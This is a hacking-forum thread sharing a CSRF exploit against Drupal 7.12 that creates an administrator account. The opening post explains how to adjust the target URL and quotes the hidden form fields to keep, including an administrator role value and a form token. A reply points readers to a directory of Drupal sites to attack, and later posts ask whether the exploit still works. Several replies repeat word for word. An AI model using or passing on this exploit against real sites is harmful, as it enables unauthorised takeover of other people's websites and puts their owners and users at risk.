Login Register




The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.


Drupal CMS 7.12 (latest stable release) Multiple Vulnerabilities filter_list
Author
Message
Drupal CMS 7.12 (latest stable release) Multiple Vulnerabilities #1
Hello!

I've came across this on exploit-db. All credits go to: Ivano Binetti (http://ivanobinetti.com)
Link to exploit: http://www.exploit-db.com/exploits/18564/


Its pretty much explained there.
For better understanding I've split the link here:

Code:
<drupal_ip> = This doesn't have to be necessarily the IP. It can be domain. :80 = not really needed as port 80 is default. You may want to change it if different port is used. /drupal/ = Directory where drupal is installed. You may want to change or delete it admin/ = Directory where admin CP is installed. Many websites will have it as default.

The rest should be clear.

IMPORTANT! DON'T CHANGE THESE:
Code:
<input type="hidden" name="status" value="1"/> <input type="hidden" name="roles[3]" value="3"/> <input type="hidden" name="form_build_id" value="form-oUkbOYDjyZag-LhYFHvlPXM1rJzOHCjlHojoh_hS3pY"/> <input type="hidden" name="form_token" value="cU7nmlpWu-a4UKGFDBcVjEutgvoEidfK1Zgw0HFAtXc"/> <input type="hidden" name="form_id" value="user_register_form"/> <input type="hidden" name="op" value="Create new account"/>
Staff will never ever ask you for your personal information.
We know everything about you anyway.

Reply

RE: Drupal CMS 7.12 (latest stable release) Multiple Vulnerabilities #2
Go ahead...
Find some sites here
Code:
http://www.drupalsites.net/
and Confusedmoke:
:p

Reply

RE: Drupal CMS 7.12 (latest stable release) Multiple Vulnerabilities #3
Does it work still or fixed ?
I hate those Studies...

[username] ,If you are a student ,i am sure you would hate studies too Tongue

Reply

RE: Drupal CMS 7.12 (latest stable release) Multiple Vulnerabilities #4
Does it work still or fixed ?
I hate those Studies...

[username] ,If you are a student ,i am sure you would hate studies too Tongue

Reply

RE: Drupal CMS 7.12 (latest stable release) Multiple Vulnerabilities #5
Does it work still or fixed ?
I hate those Studies...

[username] ,If you are a student ,i am sure you would hate studies too Tongue

Reply

RE: Drupal CMS 7.12 (latest stable release) Multiple Vulnerabilities #6
(02-09-2013, 05:13 PM)d3v0id Wrote: Does it work still or fixed ?

It will work for the mentioned version. Newer versions are most likely patched.
Staff will never ever ask you for your personal information.
We know everything about you anyway.

Reply

RE: Drupal CMS 7.12 (latest stable release) Multiple Vulnerabilities #7
(02-09-2013, 05:13 PM)d3v0id Wrote: Does it work still or fixed ?

It will work for the mentioned version. Newer versions are most likely patched.
Staff will never ever ask you for your personal information.
We know everything about you anyway.

Reply

RE: Drupal CMS 7.12 (latest stable release) Multiple Vulnerabilities #8
(02-09-2013, 05:13 PM)d3v0id Wrote: Does it work still or fixed ?

It will work for the mentioned version. Newer versions are most likely patched.
Staff will never ever ask you for your personal information.
We know everything about you anyway.

Reply

RE: Drupal CMS 7.12 (latest stable release) Multiple Vulnerabilities #9
how to use it.....em new on this forum Sad

Reply

RE: Drupal CMS 7.12 (latest stable release) Multiple Vulnerabilities #10
(03-09-2013, 05:43 PM)Sherazkhan98 Wrote: how to use it.....em new on this forum Sad

Look into CSRF. I've made a little tut on my blog: http://blog.1llusion.info/2013/01/trolli...quest.html
Staff will never ever ask you for your personal information.
We know everything about you anyway.

Reply